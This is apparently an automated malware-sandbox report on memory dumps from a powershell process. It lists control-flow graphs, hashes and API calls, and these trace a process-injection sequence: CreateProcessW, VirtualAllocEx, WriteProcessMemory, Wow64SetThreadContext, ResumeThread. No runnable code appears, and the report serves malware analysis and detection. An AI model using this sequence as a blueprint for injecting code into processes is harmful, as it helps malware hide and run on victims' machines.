11596->11597 11598 4baa922 11597->11598 11598->11591 11598->11603 11617 4ba8f74 11598->11617 11601 4baa99f 11602 4baa9a8 ResumeThread 11601->11602 11601->11603 11602->11603 11603->11554 11604->11595 11606 4baabf0 CreateProcessW 11605->11606 11608 4baad49 11606->11608 11610 4baae30 Wow64SetThreadContext 11609->11610 11612 4baaeaa 11610->11612 11612->11588 11614 4baafa8 WriteProcessMemory 11613->11614 11616 4bab033 11614->11616 11616->11595 11618 4baae30 Wow64SetThreadContext 11617->11618 11620 4baa997 11618->11620 11620->11591 11620->11601

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 575 4baa3f0-4baa3f5 576 4baa3f6-4baa425 575->576 578 4baa3ee 576->578 579 4baa426-4baa4a1 576->579 578->576 583 4baabd9-4baac69 579->583 584 4baa4a7-4baa4b7 579->584 590 4baac6b-4baac6e 583->590 591 4baac71-4baac78 583->591 588 4baa4b9-4baa4be 584->588 589 4baa4c0 584->589 592 4baa4c2-4baa4c4 588->592 589->592 590->591 593 4baac7a-4baac80 591->593 594 4baac83-4baac99 591->594 595 4baa4db-4baa4fa call 4ba8f44 592->595 596 4baa4c6-4baa4d9 592->596 593->594 598 4baac9b-4baaca1 594->598 599 4baaca4-4baad47 CreateProcessW 594->599 602 4baa4fc-4baa501 595->602 603 4baa503 595->603 596->595 598->599 606 4baad49-4baad4f 599->606 607 4baad50-4baadc8 599->607 605 4baa505-4baa507 602->605 603->605 608 4baab4f-4baab62 605->608 609 4baa50d-4baa522 605->609 606->607 626 4baadda-4baade1 607->626 627 4baadca-4baadd0 607->627 620 4baab69-4baab7f 608->620 615 4baab4a 609->615 616 4baa528-4baa54c 609->616 615->608 616->620 625 4baa552-4baa565 call 4ba8f50 616->625 620->583 633 4baab81-4baab8b 620->633 634 4baa56b-4baa572 625->634 635 4baaaed-4baaaef 625->635 630 4baadf8 626->630 631 4baade3-4baadf2 626->631 627->626 638 4baadf9 630->638 631->630 643 4baab8d-4baab94 633->643 644 4baab96-4baab98 633->644 636 4baa578-4baa582 634->636 637 4baaad3-4baaae6 634->637 636->620 640 4baa588-4baa5a5 636->640 637->635 638->638 640->615 642 4baa5ab-4baa5c5 call 4ba8f5c 640->642 652 4baa5cb-4baa5d2 642->652 653 4baaaf4 642->653 647 4baab9a-4baab9e 643->647 644->647 649 4baaba0 call 4ba9fbc 647->649 650 4baaba5-4baabb2 647->650 649->650 664 4baabb9-4baabd6 650->664 665 4baabb4 650->665 655 4baa5d8-4baa5e1 652->655 656 4baaab9-4baaacc 652->656 658 4baaafb 653->658 659 4baa64c-4baa652 655->659 660 4baa5e3-4baa627 655->660 656->637 666 4baab05 658->666 659->615 661 4baa658-4baa668 659->661 670 4baa629-4baa62f 660->670 671 4baa630-4baa63c 660->671 661->615 672 4baa66e-4baa6c1 VirtualAllocEx 661->672 665->664 673 4baab0c 666->673 670->671 671->658 674 4baa642-4baa646 671->674 679 4baa6ca-4baa6e8 672->679 680 4baa6c3-4baa6c9 672->680 678 4baab13 673->678 674->659 676 4baaa9f-4baaab2 674->676 676->656 683 4baab1a 678->683 679->666 682 4baa6ee-4baa6f5 679->682 680->679 686 4baa6fb-4baa702 682->686 687 4baa77c-4baa783 682->687 690 4baab21 683->690 686->673 689 4baa708-4baa70f 686->689 687->678 688 4baa789-4baa790 687->688 691 4baa796-4baa7b1 call 4ba8f68 688->691 692 4baaa85-4baaa98 688->692 689->687 693 4baa711-4baa763 VirtualAllocEx 689->693 697 4baab2b 690->697 691->683 702 4baa7b7-4baa7be 691->702 692->676 695 4baa76c-4baa776 693->695 696 4baa765-4baa76b 693->696 695->687 696->695 701 4baab32 697->701 706 4baab39 701->706 703 4baaa6b-4baaa7e 702->703 704 4baa7c4-4baa7cd 702->704 703->692 704->615 707 4baa7d3-4baa7d9 704->707 710 4baab43 706->710 707->615 709 4baa7df-4baa7ea 707->709 709->615 713 4baa7f0-4baa7f6 709->713 710->615 714 4baa8f9-4baa90a 713->714 715 4baa7fc-4baa801 713->715 714->615 719 4baa910-4baa924 call 4ba8f68 714->719 715->615 716 4baa807-4baa81a 715->716 716->615 720 4baa820-4baa833 716->720 719->701 724 4baa92a-4baa931 719->724 720->615 725 4baa839-4baa84e 720->725 726 4baaa37-4baaa4a 724->726 727 4baa937-4baa93d 724->727 725->690 732 4baa854-4baa858 725->732 744 4baaa51-4baaa64 726->744 727->615 728 4baa943-4baa954 727->728 728->706 733 4baa95a-4baa95e 728->733 734 4baa85e-4baa867 732->734 735 4baa8df-4baa8e2 732->735 737 4baa969-4baa971 733->737 738 4baa960-4baa963 733->738 734->615 740 4baa86d-4baa870 734->740 735->615 739 4baa8e8-4baa8eb 735->739 737->615 741 4baa977-4baa981 737->741 738->737 739->615 742 4baa8f1-4baa8f3 739->742 740->615 743 4baa876-4baa8a6 740->743 741->620 745 4baa987-4baa999 call 4ba8f74 741->745 742->714 742->715 743->615 753 4baa8ac-4baa8c5 call 4ba8f68 743->753 744->703 745->710 750 4baa99f-4baa9a6 745->750 754 4baa9a8-4baa9e6 ResumeThread 750->754 755 4baaa03-4baaa16 750->755 759 4baa8ca-4baa8cc 753->759 757 4baa9e8-4baa9ee 754->757 758 4baa9ef-4baa9fc 754->758 762 4baaa1d-4baaa30 755->762 757->758 761 4baa9fe 758->761 758->762 759->697 763 4baa8d2-4baa8d9 759->763 761->665 762->726 763->735 763->744
                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 04BAA6AA
                                                                              • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04BAA74C
                                                                                • Part of subcall function 04BA8F68: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18822514,00000000,?,?,?,00000000,00000000,?,04BAA7AF,?,00000000,?), ref: 04BAB024
                                                                              • ResumeThread.KERNELBASE(?), ref: 04BAA9CF
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual$MemoryProcessResumeThreadWrite
                                                                              • String ID:
                                                                              • API String ID: 2390764575-0
                                                                              • Opcode ID: 652399de81152bdf3913651cf2ab2955aaffa07a8b2a5025704d1da225d74811
                                                                              • Instruction ID: b932b7beec1c2b3ce3a0ba5bd4cfe440eb251e1161a1453c9fa50e83523b07a6
                                                                              • Opcode Fuzzy Hash: 652399de81152bdf3913651cf2ab2955aaffa07a8b2a5025704d1da225d74811
                                                                              • Instruction Fuzzy Hash: 6842D070A042198FDB24DF69C854B9EB7F2EF88304F1085E9D409AB390DB30AE95CF61

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 76e1358-76e137b 1 76e1556-76e159b 0->1 2 76e1381-76e1386 0->2 12 76e16f2-76e173e 1->12 13 76e15a1-76e15a6 1->13 3 76e139e-76e13a2 2->3 4 76e1388-76e138e 2->4 5 76e13a8-76e13ac 3->5 6 76e1503-76e150d 3->6 8 76e1392-76e139c 4->8 9 76e1390 4->9 10 76e13ae-76e13bd 5->10 11 76e13bf 5->11 14 76e150f-76e1518 6->14 15 76e151b-76e1521 6->15 8->3 9->3 16 76e13c1-76e13c3 10->16 11->16 32 76e18ab-76e18e0 12->32 33 76e1744-76e1749 12->33 17 76e15be-76e15c2 13->17 18 76e15a8-76e15ae 13->18 20 76e1527-76e1533 15->20 21 76e1523-76e1525 15->21 16->6 25 76e13c9-76e13e9 16->25 23 76e169f-76e16a9 17->23 24 76e15c8-76e15ca 17->24 27 76e15b2-76e15bc 18->27 28 76e15b0 18->28 22 76e1535-76e1553 20->22 21->22 34 76e16ab-76e16b4 23->34 35 76e16b7-76e16bd 23->35 30 76e15cc-76e15d8 24->30 31 76e15da 24->31 63 76e13eb-76e1406 25->63 64 76e1408 25->64 27->17 28->17 37 76e15dc-76e15de 30->37 31->37 57 76e18e2-76e18ee 32->57 58 76e18f0 32->58 40 76e174b-76e1751 33->40 41 76e1761-76e1765 33->41 42 76e16bf-76e16c1 35->42 43 76e16c3-76e16cf 35->43 37->23 44 76e15e4-76e15e8 37->44 46 76e1755-76e175f 40->46 47 76e1753 40->47 49 76e185a-76e1864 41->49 50 76e176b-76e176d 41->50 48 76e16d1-76e16ef 42->48 43->48 53 76e15ea-76e1606 44->53 54 76e1608 44->54 46->41 47->41 59 76e1866-76e186f 49->59 60 76e1872-76e1878 49->60 51 76e176f-76e177b 50->51 52 76e177d 50->52 69 76e177f-76e1781 51->69 52->69 67 76e160a-76e160c 53->67 54->67 70 76e18f2-76e18f4 57->70 58->70 65 76e187e-76e188a 60->65 66 76e187a-76e187c 60->66 77 76e140a-76e140c 63->77 64->77 75 76e188c-76e18a8 65->75 66->75 67->23 76 76e1612-76e1625 67->76 69->49 71 76e1787-76e1789 69->71 73 76e196e-76e1978 70->73 74 76e18f6-76e18f8 70->74 84 76e178b-76e1797 71->84 85 76e1799 71->85 80 76e197a-76e1980 73->80 81 76e1983-76e1989 73->81 86 76e18fa-76e1906 74->86 87 76e1908 74->87 105 76e162b-76e162d 76->105 77->6 83 76e1412-76e1414 77->83 89 76e198f-76e199b 81->89 90 76e198b-76e198d 81->90 92 76e1416-76e1422 83->92 93 76e1424 83->93 95 76e179b-76e179d 84->95 85->95 96 76e190a-76e190c 86->96 87->96 98 76e199d-76e19b6 89->98 90->98 99 76e1426-76e1428 92->99 93->99 95->49 100 76e17a3-76e17a5 95->100 96->73 101 76e190e-76e1914 96->101 99->6 106 76e142e-76e144e 99->106 108 76e17bf-76e17c3 100->108 109 76e17a7-76e17ad 100->109 102 76e1916-76e1918 101->102 103 76e1922-76e192b 101->103 102->103 110 76e192d-76e192f 103->110 111 76e1939-76e1956 103->111 113 76e162f-76e1635 105->113 114 76e1645-76e169c 105->114 134 76e1466-76e146a 106->134 135 76e1450-76e1456 106->135 117 76e17dd-76e1857 108->117 118 76e17c5-76e17cb 108->118 115 76e17af 109->115 116 76e17b1-76e17bd 109->116 110->111 130 76e1958-76e1968 111->130 131 76e19b9-76e19be 111->131 119 76e1639-76e163b 113->119 120 76e1637 113->120 115->108 116->108 123 76e17cf-76e17db 118->123 124 76e17cd 118->124 119->114 120->114 123->117 124->117 130->73 131->130 140 76e146c-76e1472 134->140 141 76e1484-76e1488 134->141 138 76e145a-76e145c 135->138 139 76e1458 135->139 138->134 139->134 142 76e1476-76e1482 140->142 143 76e1474 140->143 144 76e148f-76e1491 141->144 142->141 143->141 146 76e14a9-76e1500 144->146 147 76e1493-76e1499 144->147 148 76e149d-76e149f 147->148 149 76e149b 147->149 148->146 149->146
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$B$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2769017150
                                                                              • Opcode ID: b1953c07e582ddb8759965fa1674296e211cff039f9e9b505ba6e7477d74ad43
                                                                              • Instruction ID: 37ac1746867378e1c48bc66f0a45b2389180cc5f557685f1273d44f7066745c0
                                                                              • Opcode Fuzzy Hash: b1953c07e582ddb8759965fa1674296e211cff039f9e9b505ba6e7477d74ad43
                                                                              • Instruction Fuzzy Hash: 93F12BB1B0130E8FCB2C5E7998046BABBEAAF86610F14847AD447CB355DE31C946D7B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                              • API String ID: 0-1590887
                                                                              • Opcode ID: 342bb64a5863e4fa9086d015bb2ee7c5927ab57317838e53a52ab060ac4257b1
                                                                              • Instruction ID: c5389d658a29eef83cbf26827f7ccc4788496d7417d39dbaa90a2ae6c3c40693
                                                                              • Opcode Fuzzy Hash: 342bb64a5863e4fa9086d015bb2ee7c5927ab57317838e53a52ab060ac4257b1
                                                                              • Instruction Fuzzy Hash: FA122CB1B057099FCB248F39D8647AABBAFBB85310F14C46AD5468B351DB31C886CB71

Control-flow Graph
• Basic blocks 76e1d48-76e219a (rendered graph and executed/not-executed marking not recoverable from the text dump)
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3512890053
                                                                              • Opcode ID: 339c1e111a168e440dc800d862c54de68e64a586a764a4d5420199ee1dca1372
                                                                              • Instruction ID: 90070e7477c49f7d42ab0a3c19ee2e591097c65b985073d09c1b481fc0edb990
                                                                              • Opcode Fuzzy Hash: 339c1e111a168e440dc800d862c54de68e64a586a764a4d5420199ee1dca1372
                                                                              • Instruction Fuzzy Hash: 35B13CB1B0534ADFCB294A3988106BABBEEAF87210F14846BD506CF351DB31C946D7B1

Control-flow Graph
• Basic blocks 76e01e8-76e074d (rendered graph and executed/not-executed marking not recoverable from the text dump)
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3669853574
                                                                              • Opcode ID: 83fcb07fa8047420ecbd9cd957a56733f46741b619a9c4869872009639ac3e7e
                                                                              • Instruction ID: fc4585a7bd706b24cf59059009a4dc9d610627374ca700ffd9bd828af29c50fd
                                                                              • Opcode Fuzzy Hash: 83fcb07fa8047420ecbd9cd957a56733f46741b619a9c4869872009639ac3e7e
                                                                              • Instruction Fuzzy Hash: CAE107B5B01216CFDB24CA68D90066ABBEAAFC5310B34C46AD406DF355DF72DC46CBA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db7b2d08ae16ec6436cb8ce42742258ff2da98cf6d8ffc12cd5e071b2cd71ddb
                                                                              • Instruction ID: 0e7d3c20123f7835193b23afb5df358878ccb2e0e7e157827ec04b1a7e7816dc
                                                                              • Opcode Fuzzy Hash: db7b2d08ae16ec6436cb8ce42742258ff2da98cf6d8ffc12cd5e071b2cd71ddb
                                                                              • Instruction Fuzzy Hash: 44028F30A083188FEB24CF65CC54B9AB7F6EF88304F1481E9D549AB291DB70AD95CF61

Control-flow Graph
• Basic blocks 76e1338-76e19be (rendered graph and executed/not-executed marking not recoverable from the text dump)
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$$^q$$^q
                                                                              • API String ID: 0-2291298209
                                                                              • Opcode ID: e8a3708b97a15a3329d160618af767999fd47c09b76806dee3fcefdc28ce9f54
                                                                              • Instruction ID: d6063e9fd7c56c0860463a560f527ac6b6ab2e047e19072ccf832d1e7af42629
                                                                              • Opcode Fuzzy Hash: e8a3708b97a15a3329d160618af767999fd47c09b76806dee3fcefdc28ce9f54
                                                                              • Instruction Fuzzy Hash: 443109F0A1630EDFDB294A35C4107B97BA9AF43214F548066D402CB392FB35CA4AD7B1

Control-flow Graph
• Basic blocks 76e1d28-76e219a (rendered graph and executed/not-executed marking not recoverable from the text dump)
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$$^q$$^q
                                                                              • API String ID: 0-2291298209
                                                                              • Opcode ID: 8fadc498671e5487426b50a324016deeb5a3b4961e705139234d2a91ca215ba4
                                                                              • Instruction ID: b92377b20cfbc2841958b4a25b685df77ac3a61a7ffa3fac52d388ec2c3f80ee
                                                                              • Opcode Fuzzy Hash: 8fadc498671e5487426b50a324016deeb5a3b4961e705139234d2a91ca215ba4
                                                                              • Instruction Fuzzy Hash: E531C1B5E0630EDFCB2C8E35C84066A7BE9EF43250F598566E8168B241C735C845EBB1

Control-flow Graph
• Basic blocks 76e0b80-76e0cfe (rendered graph and executed/not-executed marking not recoverable from the text dump)
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q
                                                                              • API String ID: 0-309238000
                                                                              • Opcode ID: be87e05f3ecceea891e275597a902d65bc9ace858965b8c697fd0129ee8a6d73
                                                                              • Instruction ID: c3928eb3a6680d55f0715b21e2d0402902913908ef32301ab6c0c9f4ae0bc14b
                                                                              • Opcode Fuzzy Hash: be87e05f3ecceea891e275597a902d65bc9ace858965b8c697fd0129ee8a6d73
                                                                              • Instruction Fuzzy Hash: 38415B70B013186FCB249B748C05B6A7FEABF89B14F648456E445DF381CAB19C85C7B2

Control-flow Graph
• Basic blocks 4ba8f44-4baadf9; block 4baaca4-4baad47 calls CreateProcessW (rendered graph and executed/not-executed marking not recoverable from the text dump)
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04BAAD34
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 479cfd9a0b1faa75906f21b4e7df8b903e85dad0d11a77fb4be21304dc583066
                                                                              • Instruction ID: d80cec57a6a067e2077a141b955fe7ecee33134285e0e10d993f88006bea986c
                                                                              • Opcode Fuzzy Hash: 479cfd9a0b1faa75906f21b4e7df8b903e85dad0d11a77fb4be21304dc583066
                                                                              • Instruction Fuzzy Hash: 9C51187190121ADFDB24CF99C940BDEBBB5BF48304F1484EAE909B7250D775AA84CFA0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18822514,00000000,?,?,?,00000000,00000000,?,04BAA7AF,?,00000000,?), ref: 04BAB024
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 590eabac1a2000646b2806e3ccb537c6fe93a69890874ff123334702771d1338
                                                                              • Instruction ID: 79c951f8f691f303ca8dc3e1611785518d663097ef773dd9cfe1818cd3f23c63
                                                                              • Opcode Fuzzy Hash: 590eabac1a2000646b2806e3ccb537c6fe93a69890874ff123334702771d1338
                                                                              • Instruction Fuzzy Hash: 2B2107B1904349DFDB10CF99D884BDEBBF4FB48320F108469E518A7240D378A954CFA5

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18822514,00000000,?,?,?,00000000,00000000,?,04BAA7AF,?,00000000,?), ref: 04BAB024
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: cc9893b9579370297d7f93456ee8d672eb7822d7ee947f57cfc3e7451c2a7e75
                                                                              • Instruction ID: c533f8ae870838fb540fd98aee517e51634e0d4765f88ce7991c56084720710b
                                                                              • Opcode Fuzzy Hash: cc9893b9579370297d7f93456ee8d672eb7822d7ee947f57cfc3e7451c2a7e75
                                                                              • Instruction Fuzzy Hash: 7C2115B6904349DFDB10CFA9D884BEEBBF4FB08324F10842AE518A7200D378A644CF65

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04BAA563), ref: 04BAAE9B
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: c2bb9a489cd9c8a7249ab17f56cabf7ff7d7f0613c5a416f5c5eca81dce9a9c6
                                                                              • Instruction ID: e0cc83bb8a59da490f4ee1ed749ba5be839e331216e5fa64f2bd60618b8a7b36
                                                                              • Opcode Fuzzy Hash: c2bb9a489cd9c8a7249ab17f56cabf7ff7d7f0613c5a416f5c5eca81dce9a9c6
                                                                              • Instruction Fuzzy Hash: 2F1126B2D043098FDB10DF9AC844BDEFBF4EB88320F248469D458A3240D378A545CFA5

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04BAA563), ref: 04BAAE9B
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 45a81c95ab948b16cf611a9b06adff5f13394d1128ed22e5536aa9b5c3199f7a
                                                                              • Instruction ID: b23bd1fbdea85299527d1e20c089c9c373c5bb66f1ce1d182d9c10a8607241bb
                                                                              • Opcode Fuzzy Hash: 45a81c95ab948b16cf611a9b06adff5f13394d1128ed22e5536aa9b5c3199f7a
                                                                              • Instruction Fuzzy Hash: 681126B2D043098FDB10DF9AC844BDEFBF4EB88320F148469D458A3240D378A544CFA5

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04BAA563), ref: 04BAAE9B
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 19f2f73e415742ed886a2de9e9a1b0ac466a62504901b6f8df5a6939af55b03f
                                                                              • Instruction ID: 30a8039174bb36dcf277b546f49caf1ed2f554fbbc57be4e1b08358ad77b4a72
                                                                              • Opcode Fuzzy Hash: 19f2f73e415742ed886a2de9e9a1b0ac466a62504901b6f8df5a6939af55b03f
                                                                              • Instruction Fuzzy Hash: 2E1104B6D042198FDB10CFAAD8447EEFBF4EB88320F25C46AD458A3610D778A545CFA5

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q
                                                                              • API String ID: 0-1614139903
                                                                              • Opcode ID: 1cf08f11cda1b51c931d137c8f6e6ee94bdebb413b13f0856c0d7e3c6339255b
                                                                              • Instruction ID: 6b09730adc25cb3a8f2a4bb93bea83c096127aefb4411996db00bf71afeb5fd3
                                                                              • Opcode Fuzzy Hash: 1cf08f11cda1b51c931d137c8f6e6ee94bdebb413b13f0856c0d7e3c6339255b
                                                                              • Instruction Fuzzy Hash: A42180B0A02A06CFCB24DF79C564B6977FFBB48624F1485AAD4468B350DB71D881CBB1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2046638977.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_2f2d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 47db68903518923d67166e2abd9493ae3acc1ceae0734967aafc87876e5a16d3
                                                                              • Instruction ID: 2ad21ac602a5fc74884825c0a98b444905a3e63a90a21563a0bd926b1da2e5ab
                                                                              • Opcode Fuzzy Hash: 47db68903518923d67166e2abd9493ae3acc1ceae0734967aafc87876e5a16d3
                                                                              • Instruction Fuzzy Hash: 37012B315093109AE710CB29CD84767BF98EF427A4F08C429EE484B15AC379D849C6B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2046638977.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_2f2d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 30ca7086214683fd540ca2a157e4967eba772a564afae4eddfe39bca2fd10981
                                                                              • Instruction ID: a4e3bfcd280f0d363250f9f9cc6bd2318f09605d6a87dfd0da5cc17ff4cac1da
                                                                              • Opcode Fuzzy Hash: 30ca7086214683fd540ca2a157e4967eba772a564afae4eddfe39bca2fd10981
                                                                              • Instruction Fuzzy Hash: 8F015E6140E3C09FE7128B258C94B52BFB4EF47624F1DC4DBD9888F1A7C2699849C772
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2047275925.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_4ba0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Xbq$$^q
                                                                              • API String ID: 0-1593437937
                                                                              • Opcode ID: 47966a9e75fb83015258345c0c78dc07604666338bb07b2a542944f4f59e2f2d
                                                                              • Instruction ID: c7aeac330c5a729d6df9ca55d3b31b6ddad4e37c7dcde8841d5b29691c8e7043
                                                                              • Opcode Fuzzy Hash: 47966a9e75fb83015258345c0c78dc07604666338bb07b2a542944f4f59e2f2d
                                                                              • Instruction Fuzzy Hash: ABD13EB0B082149FDB189B78885427E7BB7FFC5300F05889EE546DB385DE35AC52A791
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2101345018.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_76e0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                              • API String ID: 0-2049395529
                                                                              • Opcode ID: e6aa7fe544a38f53a83825cf0be41a03a1b6a015fbf9ace0387fdff847dd38cd
                                                                              • Instruction ID: 92ae1570a12b9bc8d9a18614149f214f844d9bd7f69430e45ec031d2b5d678f2
